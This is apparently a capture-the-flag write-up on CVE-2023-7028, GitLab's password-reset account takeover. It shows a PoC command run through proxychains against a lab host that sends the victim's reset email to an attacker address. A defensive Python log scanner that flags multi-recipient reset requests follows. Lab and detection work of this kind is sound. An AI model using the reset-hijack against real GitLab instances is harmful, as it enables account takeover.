Tutorial level

┌──(root㉿kali)-[~/poc/CVE/2023-7028]
└─# p4 python poc.py -u http://10.10.24.8:8000 -t victim@mail.gitlab.thm -e attacker@mail.gitlab.thm
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[DEBUG] Getting authenticity_token ...
[proxychains] Strict chain ... 120.46.78.45:7777 ... 10.10.24.8:8000 ... OK
[DEBUG] authenticity_token = Pz24wEXlGsshAPFmSG8dISVYFJW2SXNGi-OMzksGkeJtelkYyGAdAYuEKrL-3GM6DKUlxeUcmgEkdCJNpup9Kg
[DEBUG] Sending reset password request
[proxychains] Strict chain ... 120.46.78.45:7777 ... 10.10.24.8:8000 ... OK
[DEBUG] Emails sent to victim@mail.gitlab.thm and attacker@mail.gitlab.thm !
Flag value: account_hack#d

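This feels about the same as the phone-number concatenation I saw in that one from 国光.
Here a token is used, but the email gets sent to your own mailbox.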
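
A defender-side check for the behaviour in the output above, added here as an example and not part of the original notes or the PoC: it scans JSON request logs for password-reset requests whose `user` `email` parameter carried more than one address. The log field layout is assumed to match GitLab's `production_json.log`; the sample lines and the 192.0.2.x addresses are constructed.

```python
import json

# Constructed sample lines; the field layout (method, path, params as key/value
# pairs) is assumed to match gitlab-rails/production_json.log.
def _line(method, path, ip, email):
    return json.dumps({"method": method, "path": path, "remote_ip": ip,
                       "params": [{"key": "authenticity_token", "value": "[FILTERED]"},
                                  {"key": "user", "value": {"email": email}}]})

SAMPLE_LOG = "\n".join([
    _line("POST", "/users/password", "192.0.2.10", "victim@mail.gitlab.thm"),
    _line("POST", "/users/password", "192.0.2.66",
          ["victim@mail.gitlab.thm", "attacker@mail.gitlab.thm"]),
    _line("POST", "/users/sign_in", "192.0.2.10", "victim@mail.gitlab.thm"),
    "truncated or non-JSON line",
])

def reset_emails(entry):
    """Email values submitted in one password-reset request, as a list."""
    if entry.get("method") != "POST" or \
       not str(entry.get("path", "")).endswith("/users/password"):
        return []
    for param in entry.get("params") or []:
        if not isinstance(param, dict) or param.get("key") != "user":
            continue
        value = param.get("value")
        email = value.get("email") if isinstance(value, dict) else None
        if isinstance(email, dict):      # hash form, e.g. user[email][0]=...
            email = list(email.values())
        if isinstance(email, str):       # normal single-address request
            email = [email]
        return [e for e in email or [] if isinstance(e, str)]
    return []

def find_multi_recipient_resets(log_text):
    """Flag reset requests that named more than one distinct address."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        try:
            entry = json.loads(line)
        except ValueError:
            continue                     # skip lines that are not JSON
        if not isinstance(entry, dict):
            continue
        emails = reset_emails(entry)
        if len({e.strip().lower() for e in emails}) > 1:
            hits.append({"line": lineno, "remote_ip": entry.get("remote_ip"),
                         "emails": emails})
    return hits
```

Calling `find_multi_recipient_resets(SAMPLE_LOG)` flags only the second sample line, the one where the reset was requested for two addresses at once.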